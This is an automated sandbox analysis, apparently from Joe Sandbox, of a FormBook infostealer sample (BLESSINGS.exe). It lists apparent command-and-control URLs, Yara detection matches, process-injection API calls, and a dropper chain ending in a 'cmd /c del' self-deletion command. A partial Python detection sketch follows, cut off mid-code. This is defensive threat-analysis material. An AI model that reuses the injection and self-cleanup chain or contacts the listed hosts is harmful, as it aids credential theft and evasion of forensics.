          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.com/jqc/www.11sxsx.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.screwtaped.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.com/jqc/www.registeredagentfirm.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.sterlworldshop.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.com/jqc/www.droriginals.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.the343radio.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.com/jqc/www.quintred.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.toweroflifeinc.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: raserver.exe, 0000000F.00000002.688978959.0000000004F1F000.00000004.00000001.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=quintred.com&origin=sales_lande
          Source: BLESSINGS.exe, 00000001.00000002.422231496.0000000001180000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_00419D60 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_00419E10 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_00419E90 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_00419D5D NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_00419E0B NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_00419E8A NtClose,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_00419F3A NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_017799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_017798F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_017795D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_017797A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_017796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_017799D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_0177B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_017798A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_0177A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_0177AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_017795F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_0177A770 NtOpenThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_0177A710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779FE0 NtCreateMutant,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_01779610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 8_2_017796D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_045695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_045699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_045696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_045696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_0456B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_045698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_045698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569560 NtWriteFile,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_0456AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_045699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_045695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_0456A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_0456A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_04569730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_0456A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_045697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_001E9D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_001E9E10 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_001E9E90 NtClose,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_001E9F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_001E9D5D NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_001E9E0B NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_001E9E8A NtClose,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 15_2_001E9F3A NtAllocateVirtualMemory,
          Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: String function: 0452B150 appears 35 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: String function: 0173B150 appears 35 times
          Source: BLESSINGS.exe, Binary or memory string: OriginalFilename vs BLESSINGS.exe
          Source: BLESSINGS.exe, 00000001.00000002.429031848.0000000005240000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamemscorrc.dllT vs BLESSINGS.exe
          Source: BLESSINGS.exe, 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameRunPe6.dll" vs BLESSINGS.exe
          Source: BLESSINGS.exe, 00000001.00000002.427311961.0000000003E01000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameSHCore1.dll0 vs BLESSINGS.exe
          Source: BLESSINGS.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/2@3/1
          Source: C:\Users\user\Desktop\BLESSINGS.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BLESSINGS.exe.log
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_01
          Source: C:\Users\user\Desktop\BLESSINGS.exe | File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: BLESSINGS.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 entries)
          Source: BLESSINGS.exe | Virustotal: Detection: 45%
          Source: BLESSINGS.exe | ReversingLabs: Detection: 15%
          Source: unknown | Process created: C:\Users\user\Desktop\BLESSINGS.exe 'C:\Users\user\Desktop\BLESSINGS.exe'
          Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
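The process creations above form a chain worth encoding as a detection: the .NET dropper (BLESSINGS.exe) writes a copy of a framework helper (AddInProcess32.exe) into the user's Temp directory and runs it, and later a SysWOW64 binary (raserver.exe) spawns cmd.exe to delete that dropped file. The Python below is an added example, not part of this report or of the sandbox, that applies those two rules to constructed process-creation events modelled on the lines above. PIDs are invented, and the parent of raserver.exe, which the report lists only as unknown, is assumed to be explorer.exe.

```python
"""Detection logic for the dropper -> dropped helper -> system binary -> self-delete chain."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str    # arguments as logged


TEMP_RE = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\\", re.I)
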